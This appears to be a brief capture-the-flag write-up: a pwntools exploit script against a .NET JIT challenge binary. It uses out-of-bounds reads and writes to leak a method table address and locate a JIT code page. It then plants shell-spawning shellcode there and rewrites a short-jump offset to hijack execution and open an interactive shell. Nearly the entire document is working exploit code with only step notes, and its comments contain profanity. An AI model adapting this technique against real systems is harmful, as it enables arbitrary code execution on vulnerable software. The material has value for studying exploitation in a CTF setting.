Tags: jit dotnet pwn
Rating:
```
"""
00007fb352321288 - fastbytearray MT (+32 from target addr) ->
0x00007fb352321268 - part of unknown MT ->
0x00007fb3521a4fe0 (+210 from target JIT address) ->
0x7fb3521a4f0e (target JIT address) <- write shellcode here
Steps:
- read fastbytearray MT
- fastbytearray MT - 32 = location of JIT addr
- read location of JIT addr
- JIT addr - 210 = target JIT addr (+18 for jump instruction location)
- write shellcode to nearby unused address
- overwrite short jump's offset byte
- run any command
"""
array_size = 100
pause()
for _ in range(15):
create(array_size)
read(1, array_size + 76, 8)
# read MT address for FastByteArray
fba_mt = u64(recv().ljust(8, "\x00"))
pause()
# pointer to address in used JIT page
jit_addr = read_any(fba_mt - 32)
# address in JIT page to short jump instruction called for all r/w operations
target_addr = u64(jit_addr) - 192
print "short jump instruction at: ", hex(target_addr)
pause()
shellcode = asm(shellcraft.amd64.linux.sh())
shellcode_addr = target_addr + 115 # I've stopped giving a fuck
write_any(shellcode_addr, shellcode, size=len(shellcode))
# modify short jump to go to unused code area (offset 115 from eip)
write_any(target_addr + 1, "\x71", size=1)
p.interactive()
```
